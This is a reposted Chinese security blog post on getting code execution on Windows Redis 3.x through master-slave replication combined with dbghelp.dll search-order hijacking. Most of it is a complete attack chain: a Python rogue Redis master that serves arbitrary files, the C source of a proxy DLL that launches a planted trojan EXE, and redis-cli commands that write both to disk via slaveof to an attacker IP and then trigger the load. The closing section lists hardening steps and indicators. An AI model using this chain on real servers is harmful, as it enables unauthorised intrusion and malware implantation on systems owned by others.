windows利用Redis主从复制获取系统权限


前言

 Redis 在 Linux 上获取权限的方法较多，但这些方法大多依赖 Linux 的文件系统布局和服务特性，在 Windows 上基本无法使用；在 Windows 上比较通用的做法是利用主从复制：让目标 Redis 从攻击者控制的“主节点”同步，主节点在 FULLRESYNC 阶段返回的“RDB 快照”会被目标原样写到 dir/dbfilename 指定的路径，从而得到一个任意文件写入原语。

一、主从复制在windows中的问题

    1. 内网中最常见的是 [redis3.0.5](https://github.com/microsoftarchive/redis) 及更低版本。Linux 下的主从复制攻击依赖 module 功能：先通过主从复制把一个 .so 写到目标磁盘，再用 MODULE LOAD 加载它，向 Redis 添加一个可执行系统命令的函数。但 module 功能是 Redis 4.0 才引入的，redis 3.x 没有 MODULE LOAD，因此无法通过这条路径添加命令执行函数。

    2. redis 4 可以通过 module 添加命令执行函数，但在 Windows 上需要编写对应的 module dll；作者尝试编写过这种 dll，发现它非常容易导致 redis-server 服务崩溃，攻击者会因此失去立足点。

二、使用dll劫持解决无module功能

 Windows 下的 redis-server.exe 按文件名加载 dbghelp.dll，因此放在 redis-server.exe 同目录下的同名 dll 会先于 %SystemRoot%\System32 中的系统 dll 被加载，这是一个典型的 DLL 搜索顺序劫持；利用它的前提是能向 redis 目录写文件，而上面的主从复制正好提供了这一能力。本文仅在 redis 3.0.5（https://github.com/microsoftarchive/redis）上测试过。这样就可以绕过 module 的限制：先用主从复制把我们的 dll 写到 redis 目录，再让 redis 加载它。

三、攻击步骤演示

1. 搭建一个恶意的redis

    python redis.py --lport 6379 -f dbghelp.dll

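import argparse
import socket
from time import sleep

# Line terminator of the Redis Serialization Protocol (RESP).
CRLF = b"\r\n"

# Bytes delivered to the replica as the "RDB snapshot". Set by __main__ from
# the -f/--exp file; RogueServer() falls back to it when no payload is passed.
payload = b""


def build_fullresync_response(body, run_id="Z" * 40, offset=1):
    """Build the reply a rogue master sends to the replica's SYNC/PSYNC.

    The reply is the RESP simple string ``+FULLRESYNC <run_id> <offset>``
    followed by the snapshot framed as a RESP bulk string
    (``$<len>\\r\\n<bytes>``). The replica writes those ``len`` bytes to
    ``dir/dbfilename`` before trying to parse them as RDB, which is what
    turns replication into an arbitrary file write. A trailing CRLF is kept
    for parity with the original tool; the replica reads exactly ``len``
    snapshot bytes, so the extra terminator only reaches its command stream.

    :param body: raw file content to deliver (bytes).
    :param run_id: 40-character replication id; the replica does not need a
        real one.
    :param offset: replication offset advertised to the replica.
    :return: the complete response as bytes.
    """
    header = ("+FULLRESYNC %s %d" % (run_id, offset)).encode()
    length = ("$%d" % len(body)).encode()
    return header + CRLF + length + CRLF + body + CRLF


def handshake_reply(request, body):
    """Return the response to one replica request, or None to end the session.

    Mirrors the handshake a Redis replica performs against its master:
    ``PING`` -> ``+PONG``, ``REPLCONF ...`` -> ``+OK``, ``SYNC``/``PSYNC`` ->
    the FULLRESYNC reply carrying ``body``. Anything else, including the empty
    read that signals a disconnect, ends the session.

    :param request: raw bytes read from the replica (may hold several commands).
    :param body: snapshot bytes passed on to build_fullresync_response().
    :return: bytes to send, or None.
    """
    if b"PING" in request:
        return b"+PONG" + CRLF
    if b"REPLCONF" in request:
        return b"+OK" + CRLF
    if b"SYNC" in request:  # matches both SYNC and PSYNC
        return build_fullresync_response(body)
    return None


def RogueServer(lport, data=None, lhost="0.0.0.0"):
    """Accept one replica connection and drive it through a fake full resync.

    Listens on ``lhost:lport``, answers the replica's handshake and serves
    ``data`` as the RDB snapshot, then returns once the replica sends anything
    unexpected or disconnects. Sockets are closed on every exit path.

    :param lport: TCP port to listen on.
    :param data: snapshot bytes to deliver; defaults to the module-level
        ``payload`` (the original tool read that global directly).
    :param lhost: address to bind; 0.0.0.0 (all interfaces) as in the original.
    """
    body = payload if data is None else data
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.bind((lhost, lport))
        srv.listen(10)
        conn, address = srv.accept()
        print("Replica connected from %s:%d" % address)
        with conn:
            # Delay before answering the handshake, kept from the original tool.
            sleep(5)
            while True:
                try:
                    request = conn.recv(1024)
                except OSError:
                    break  # replica went away mid-handshake
                reply = handshake_reply(request, body)
                if reply is None:
                    break
                # sendall(): a plain send() may write only part of a
                # multi-megabyte DLL/EXE payload.
                conn.sendall(reply)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="Rogue Redis master that serves an arbitrary file as the RDB snapshot.")
    parser.add_argument("--lport", dest="lp", type=int, default=6379, metavar="LOCAL_PORT",
                        help="rogue server listen port, default 6379")
    parser.add_argument("-f", "--exp", dest="exp", default="exp.so", metavar="EXP_FILE",
                        help="file to deliver as the snapshot (Redis module, DLL, EXE ...), default exp.so")
    args = parser.parse_args()
    with open(args.exp, "rb") as f:
        payload = f.read()
    print("Start listening on port: %s" % args.lp)
    print("Load the payload: %s" % args.exp)
    RogueServer(args.lp, payload)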

2. 编写dll代码

    网上有些文章会在 dll 中直接加载 CS 的 shellcode，这种方式有一定概率导致 redis-server 服务崩溃，所以这里改为通过 CreateProcess 启动一个独立进程来执行木马：即使进程创建失败，redis-server 也不会受影响。使用 dll_hack（https://github.com/JKme/sb_kiddie-/tree/master/hacking_win/dll_hijack）生成 VS 转发（代理）dll 项目：`python dll_hack.py C:\windows\system32\dbghelp.dll`，这个 dll 就是系统自带的 %SystemRoot%\System32\dbghelp.dll。创建好项目后，用以下代码在 DllMain 中加载真正的 dbghelp.dll、解析全部转发函数并创建进程。注意源码中路径字符串里的反斜杠必须写成 `\\`，否则无法编译或路径错误。

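#include <windows.h>
#include "dbghelp.h"

/*
 * Proxy ("hijack") dbghelp.dll for Windows redis-server.
 *
 * redis-server loads dbghelp.dll by bare name, so a copy placed in its own
 * directory is found ahead of the genuine %SystemRoot%\System32\dbghelp.dll.
 * This stub loads the genuine library, binds every forwarded export to it
 * (the g_* slots are declared in the generated dbghelp.h and are the jump
 * targets of the forwarding thunks) and, as a side effect of being loaded,
 * starts a second-stage executable in a separate process. Spawning a process
 * rather than running shellcode in-process is what keeps redis-server alive
 * if the payload is missing or fails.
 */

/* Full path of the genuine dbghelp.dll; filled in by LoadRealDbgHelp(). */
TCHAR tzPath[MAX_PATH];
/* Module handle of the genuine dbghelp.dll that all forwarders resolve through. */
HMODULE sysdll;

/*
 * Start the second-stage binary in its own process and detach from it.
 * Failure is deliberately ignored so that a missing or blocked payload never
 * takes redis-server down with it. The child inherits redis-server's token,
 * so it runs as whatever account the redis service runs as.
 */
VOID TestCreateProcessByAppName(void)
{
    STARTUPINFO si = { 0 };
    PROCESS_INFORMATION pi = { 0 };
    /* Backslashes must be doubled: a literal "\u" is an (invalid) escape
     * sequence, not a path separator, and does not compile. */
    TCHAR szAppName[] = TEXT("C:\\users\\public\\IconCache.exe");

    si.cb = sizeof(si);
    if (CreateProcess(szAppName, NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE,
                      NULL, NULL, &si, &pi)) {
        /* We never wait on the child; drop the handles so they do not leak
         * into the long-lived redis-server process. */
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }
}

/*
 * Build "<system directory>\dbghelp.dll" in tzPath and load it into sysdll.
 * Returns FALSE if the path would not fit in MAX_PATH or the load fails.
 */
static BOOL LoadRealDbgHelp(void)
{
    static const TCHAR suffix[] = TEXT("\\dbghelp.dll");
    const UINT suffix_len = sizeof(suffix) / sizeof(suffix[0]); /* incl. NUL */
    UINT len = GetSystemDirectory(tzPath, MAX_PATH);

    /* GetSystemDirectory returns 0 on error and the required size when the
     * buffer is too small; in both cases an unchecked lstrcat would overflow. */
    if (len == 0 || len + suffix_len > MAX_PATH)
        return FALSE;
    lstrcat(tzPath, suffix);

    /* Spell out the .dll extension instead of relying on LoadLibrary's
     * default-extension rule; the path is absolute so no search order applies. */
    sysdll = LoadLibrary(tzPath);
    return sysdll != NULL;
}

/* Bind g_<name> to the export of the same name in the genuine dbghelp.dll. */
#define RESOLVE(name) (g_##name = GetProcAddress(sysdll, #name))

/*
 * DLL entry point. On process attach: load the real dbghelp.dll, wire up the
 * forwarders, then launch the payload. Thread attach/detach and process
 * detach do nothing.
 *
 * NOTE(review): Microsoft's DllMain guidance says not to call LoadLibrary or
 * CreateProcess under the loader lock. This mirrors the original technique
 * (the article reports testing only against redis 3.0.5); moving the work to
 * a worker thread would be the safer design if a host ever hangs here.
 */
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    (void)hModule;
    (void)lpReserved;

    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        /* Without the genuine library every forwarder would be NULL and the
         * first dbghelp call would crash the host; refuse to load instead. */
        if (!LoadRealDbgHelp())
            return FALSE;
        RESOLVE(DbgHelpCreateUserDump);
        RESOLVE(DbgHelpCreateUserDumpW);
        RESOLVE(EnumDirTree);
        RESOLVE(EnumDirTreeW);
        RESOLVE(EnumerateLoadedModules);
        RESOLVE(EnumerateLoadedModules64);
        RESOLVE(EnumerateLoadedModulesEx);
        RESOLVE(EnumerateLoadedModulesExW);
        RESOLVE(EnumerateLoadedModulesW64);
        RESOLVE(ExtensionApiVersion);
        RESOLVE(FindDebugInfoFile);
        RESOLVE(FindDebugInfoFileEx);
        RESOLVE(FindDebugInfoFileExW);
        RESOLVE(FindExecutableImage);
        RESOLVE(FindExecutableImageEx);
        RESOLVE(FindExecutableImageExW);
        RESOLVE(FindFileInPath);
        RESOLVE(FindFileInSearchPath);
        RESOLVE(GetSymLoadError);
        RESOLVE(GetTimestampForLoadedLibrary);
        RESOLVE(ImageDirectoryEntryToData);
        RESOLVE(ImageDirectoryEntryToDataEx);
        RESOLVE(ImageNtHeader);
        RESOLVE(ImageRvaToSection);
        RESOLVE(ImageRvaToVa);
        RESOLVE(ImagehlpApiVersion);
        RESOLVE(ImagehlpApiVersionEx);
        RESOLVE(MakeSureDirectoryPathExists);
        RESOLVE(MiniDumpReadDumpStream);
        RESOLVE(MiniDumpWriteDump);
        RESOLVE(RangeMapAddPeImageSections);
        RESOLVE(RangeMapCreate);
        RESOLVE(RangeMapFree);
        RESOLVE(RangeMapRead);
        RESOLVE(RangeMapRemove);
        RESOLVE(RangeMapWrite);
        RESOLVE(RemoveInvalidModuleList);
        RESOLVE(ReportSymbolLoadSummary);
        RESOLVE(SearchTreeForFile);
        RESOLVE(SearchTreeForFileW);
        RESOLVE(SetCheckUserInterruptShared);
        RESOLVE(SetSymLoadError);
        RESOLVE(StackWalk);
        RESOLVE(StackWalk64);
        RESOLVE(StackWalkEx);
        RESOLVE(SymAddSourceStream);
        RESOLVE(SymAddSourceStreamA);
        RESOLVE(SymAddSourceStreamW);
        RESOLVE(SymAddSymbol);
        RESOLVE(SymAddSymbolW);
        RESOLVE(SymAddrIncludeInlineTrace);
        RESOLVE(SymAllocDiaString);
        RESOLVE(SymCleanup);
        RESOLVE(SymCompareInlineTrace);
        RESOLVE(SymDeleteSymbol);
        RESOLVE(SymDeleteSymbolW);
        RESOLVE(SymEnumLines);
        RESOLVE(SymEnumLinesW);
        RESOLVE(SymEnumProcesses);
        RESOLVE(SymEnumSourceFileTokens);
        RESOLVE(SymEnumSourceFiles);
        RESOLVE(SymEnumSourceFilesW);
        RESOLVE(SymEnumSourceLines);
        RESOLVE(SymEnumSourceLinesW);
        RESOLVE(SymEnumSym);
        RESOLVE(SymEnumSymbols);
        RESOLVE(SymEnumSymbolsEx);
        RESOLVE(SymEnumSymbolsExW);
        RESOLVE(SymEnumSymbolsForAddr);
        RESOLVE(SymEnumSymbolsForAddrW);
        RESOLVE(SymEnumSymbolsW);
        RESOLVE(SymEnumTypes);
        RESOLVE(SymEnumTypesByName);
        RESOLVE(SymEnumTypesByNameW);
        RESOLVE(SymEnumTypesW);
        RESOLVE(SymEnumerateModules);
        RESOLVE(SymEnumerateModules64);
        RESOLVE(SymEnumerateModulesW64);
        RESOLVE(SymEnumerateSymbols);
        RESOLVE(SymEnumerateSymbols64);
        RESOLVE(SymEnumerateSymbolsW);
        RESOLVE(SymEnumerateSymbolsW64);
        RESOLVE(SymFindDebugInfoFile);
        RESOLVE(SymFindDebugInfoFileW);
        RESOLVE(SymFindExecutableImage);
        RESOLVE(SymFindExecutableImageW);
        RESOLVE(SymFindFileInPath);
        RESOLVE(SymFindFileInPathW);
        RESOLVE(SymFreeDiaString);
        RESOLVE(SymFromAddr);
        RESOLVE(SymFromAddrW);
        RESOLVE(SymFromIndex);
        RESOLVE(SymFromIndexW);
        RESOLVE(SymFromInlineContext);
        RESOLVE(SymFromInlineContextW);
        RESOLVE(SymFromName);
        RESOLVE(SymFromNameW);
        RESOLVE(SymFromToken);
        RESOLVE(SymFromTokenW);
        RESOLVE(SymFunctionTableAccess);
        RESOLVE(SymFunctionTableAccess64);
        RESOLVE(SymFunctionTableAccess64AccessRoutines);
        RESOLVE(SymGetDiaSession);
        RESOLVE(SymGetExtendedOption);
        RESOLVE(SymGetFileLineOffsets64);
        RESOLVE(SymGetHomeDirectory);
        RESOLVE(SymGetHomeDirectoryW);
        RESOLVE(SymGetLineFromAddr);
        RESOLVE(SymGetLineFromAddr64);
        RESOLVE(SymGetLineFromAddrEx);
        RESOLVE(SymGetLineFromAddrW64);
        RESOLVE(SymGetLineFromInlineContext);
        RESOLVE(SymGetLineFromInlineContextW);
        RESOLVE(SymGetLineFromName);
        RESOLVE(SymGetLineFromName64);
        RESOLVE(SymGetLineFromNameEx);
        RESOLVE(SymGetLineFromNameW64);
        RESOLVE(SymGetLineNext);
        RESOLVE(SymGetLineNext64);
        RESOLVE(SymGetLineNextEx);
        RESOLVE(SymGetLineNextW64);
        RESOLVE(SymGetLinePrev);
        RESOLVE(SymGetLinePrev64);
        RESOLVE(SymGetLinePrevEx);
        RESOLVE(SymGetLinePrevW64);
        RESOLVE(SymGetModuleBase);
        RESOLVE(SymGetModuleBase64);
        RESOLVE(SymGetModuleInfo);
        RESOLVE(SymGetModuleInfo64);
        RESOLVE(SymGetModuleInfoW);
        RESOLVE(SymGetModuleInfoW64);
        RESOLVE(SymGetOmapBlockBase);
        RESOLVE(SymGetOmaps);
        RESOLVE(SymGetOptions);
        RESOLVE(SymGetScope);
        RESOLVE(SymGetScopeW);
        RESOLVE(SymGetSearchPath);
        RESOLVE(SymGetSearchPathW);
        RESOLVE(SymGetSourceFile);
        RESOLVE(SymGetSourceFileChecksum);
        RESOLVE(SymGetSourceFileChecksumW);
        RESOLVE(SymGetSourceFileFromToken);
        RESOLVE(SymGetSourceFileFromTokenW);
        RESOLVE(SymGetSourceFileToken);
        RESOLVE(SymGetSourceFileTokenW);
        RESOLVE(SymGetSourceFileW);
        RESOLVE(SymGetSourceVarFromToken);
        RESOLVE(SymGetSourceVarFromTokenW);
        RESOLVE(SymGetSymFromAddr);
        RESOLVE(SymGetSymFromAddr64);
        RESOLVE(SymGetSymFromName);
        RESOLVE(SymGetSymFromName64);
        RESOLVE(SymGetSymNext);
        RESOLVE(SymGetSymNext64);
        RESOLVE(SymGetSymPrev);
        RESOLVE(SymGetSymPrev64);
        RESOLVE(SymGetSymbolFile);
        RESOLVE(SymGetSymbolFileW);
        RESOLVE(SymGetTypeFromName);
        RESOLVE(SymGetTypeFromNameW);
        RESOLVE(SymGetTypeInfo);
        RESOLVE(SymGetTypeInfoEx);
        RESOLVE(SymGetUnwindInfo);
        RESOLVE(SymInitialize);
        RESOLVE(SymInitializeW);
        RESOLVE(SymLoadModule);
        RESOLVE(SymLoadModule64);
        RESOLVE(SymLoadModuleEx);
        RESOLVE(SymLoadModuleExW);
        RESOLVE(SymMatchFileName);
        RESOLVE(SymMatchFileNameW);
        RESOLVE(SymMatchString);
        RESOLVE(SymMatchStringA);
        RESOLVE(SymMatchStringW);
        RESOLVE(SymNext);
        RESOLVE(SymNextW);
        RESOLVE(SymPrev);
        RESOLVE(SymPrevW);
        RESOLVE(SymQueryInlineTrace);
        RESOLVE(SymRefreshModuleList);
        RESOLVE(SymRegisterCallback);
        RESOLVE(SymRegisterCallback64);
        RESOLVE(SymRegisterCallbackW64);
        RESOLVE(SymRegisterFunctionEntryCallback);
        RESOLVE(SymRegisterFunctionEntryCallback64);
        RESOLVE(SymSearch);
        RESOLVE(SymSearchW);
        RESOLVE(SymSetContext);
        RESOLVE(SymSetDiaSession);
        RESOLVE(SymSetExtendedOption);
        RESOLVE(SymSetHomeDirectory);
        RESOLVE(SymSetHomeDirectoryW);
        RESOLVE(SymSetOptions);
        RESOLVE(SymSetParentWindow);
        RESOLVE(SymSetScopeFromAddr);
        RESOLVE(SymSetScopeFromIndex);
        RESOLVE(SymSetScopeFromInlineContext);
        RESOLVE(SymSetSearchPath);
        RESOLVE(SymSetSearchPathW);
        RESOLVE(SymSrvDeltaName);
        RESOLVE(SymSrvDeltaNameW);
        RESOLVE(SymSrvGetFileIndexInfo);
        RESOLVE(SymSrvGetFileIndexInfoW);
        RESOLVE(SymSrvGetFileIndexString);
        RESOLVE(SymSrvGetFileIndexStringW);
        RESOLVE(SymSrvGetFileIndexes);
        RESOLVE(SymSrvGetFileIndexesW);
        RESOLVE(SymSrvGetSupplement);
        RESOLVE(SymSrvGetSupplementW);
        RESOLVE(SymSrvIsStore);
        RESOLVE(SymSrvIsStoreW);
        RESOLVE(SymSrvStoreFile);
        RESOLVE(SymSrvStoreFileW);
        RESOLVE(SymSrvStoreSupplement);
        RESOLVE(SymSrvStoreSupplementW);
        RESOLVE(SymUnDName);
        RESOLVE(SymUnDName64);
        RESOLVE(SymUnloadModule);
        RESOLVE(SymUnloadModule64);
        RESOLVE(UnDecorateSymbolName);
        RESOLVE(UnDecorateSymbolNameW);
        RESOLVE(WinDbgExtensionDllInit);
        RESOLVE(_EFN_DumpImage);
        RESOLVE(block);
        RESOLVE(chksym);
        RESOLVE(dbghelp);
        RESOLVE(dh);
        RESOLVE(fptr);
        RESOLVE(homedir);
        RESOLVE(inlinedbg);
        RESOLVE(itoldyouso);
        RESOLVE(lmi);
        RESOLVE(lminfo);
        RESOLVE(omap);
        RESOLVE(optdbgdump);
        RESOLVE(optdbgdumpaddr);
        RESOLVE(srcfiles);
        RESOLVE(stack_force_ebp);
        RESOLVE(stackdbg);
        RESOLVE(sym);
        RESOLVE(symsrv);
        RESOLVE(vc7fpo);
        /* Forwarders are live; now launch the second stage. */
        TestCreateProcessByAppName();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    default:
        break;
    }
    return TRUE;
}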

3. 上传dll到redis

    攻击者连接 Redis 服务（前提是可以未授权访问或已知 requirepass 口令，且目标没有用 rename-command 禁用 CONFIG/SLAVEOF），执行以下命令把目标 Redis 设置为攻击者控制的从节点。主节点在 FULLRESYNC 阶段发送的“RDB 快照”会被从节点原样写到 dir/dbfilename 指定的路径，这就是文件写入的原理。

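# Step 3: drop dbghelp.dll into the redis-server directory via replication.
# Run against the target with redis-cli (no auth, or -a <password>).

# Record the current values first so they can be restored afterwards.
config get dir
config get dbfilename

# Directory the RDB is written to. "./" is the redis-server process's
# working directory, which is assumed to be the directory holding
# redis-server.exe (the DLL must land there for the search-order hijack to
# work) -- confirm with "config get dir", which returns the absolute path.
config set dir ./

# Name the RDB file dbghelp.dll (default is dump.rdb).
config set dbfilename dbghelp.dll

# Point the target at the rogue master. The payload returned in FULLRESYNC is
# stored as dir/dbfilename before the replica tries to parse it as RDB; the
# parse fails, but the file stays on disk.
slaveof 192.168.172.129 6379

# After the rogue master has disconnected: restore the filename so a later
# save does not overwrite the dropped DLL with a real dump.
config set dbfilename dump.rdb

# Leave replication so the target becomes a standalone master again.
slaveof no one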

4. 上传免杀的exe木马(自备)

    python redis.py --lport 6379 -f IconCache.exe

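# Step 4: deliver the second-stage EXE to the path hard-coded in the DLL
# (C:\users\public\IconCache.exe), then trigger the DLL load. The EXE must be
# in place before dbghelp.dll is loaded, because the DLL only calls
# CreateProcess on that fixed path once, at load time.

# Write the RDB into C:\Users\Public (backslashes restored; the published
# text had lost them).
config set dir C:\Users\Public

# Name the RDB file IconCache.exe (default is dump.rdb).
config set dbfilename IconCache.exe

# Sync from the rogue master serving IconCache.exe; the payload lands as
# C:\Users\Public\IconCache.exe.
slaveof 192.168.172.129 6379

# After the rogue master has disconnected: restore dir/dbfilename to their
# original values (check them with "config get" before changing) so the next
# real save goes back to the redis-server directory as dump.rdb.
config set dir ./
config set dbfilename dump.rdb

# Leave replication.
slaveof no one

# The article states that BGSAVE is what makes redis-server load dbghelp.dll
# from its own directory, and with it the planted proxy DLL. Verify on the
# target that a new IconCache.exe process appears under the redis service
# account.
bgsave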

四、结语

    Redis 的主从复制功能本质上是为高可用设计的，但在默认安全配置不足（对外监听、未设置 requirepass、CONFIG/SLAVEOF 未被 rename-command 禁用）的情况下，这一特性就变成了任意文件写入原语，再配合 redis-server.exe 对 dbghelp.dll 的搜索顺序劫持即可实现代码执行。需要说明的是，CreateProcess 启动的木马继承 redis-server 的令牌，因此获得的权限等同于 redis 服务的运行账户，只有当服务以 LocalSystem 运行时才是 SYSTEM 权限。防守方可以：把 Redis 绑定到 127.0.0.1 或用防火墙限制 6379 端口、设置强口令、重命名或禁用 CONFIG 和 SLAVEOF、以低权限服务账户运行 redis-server；排查时关注 redis 安装目录下多出的 dbghelp.dll、C:\Users\Public\IconCache.exe，以及 redis-server 异常的子进程。希望本文能帮助读者理解 Redis 安全配置的重要性，从而在实际部署中规避类似风险。


原文始发于微信公众号(Max安全研究院):windows利用Redis主从复制获取系统权限

  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   windows利用Redis主从复制获取系统权限https://cn-sec.com/archives/3375883.html
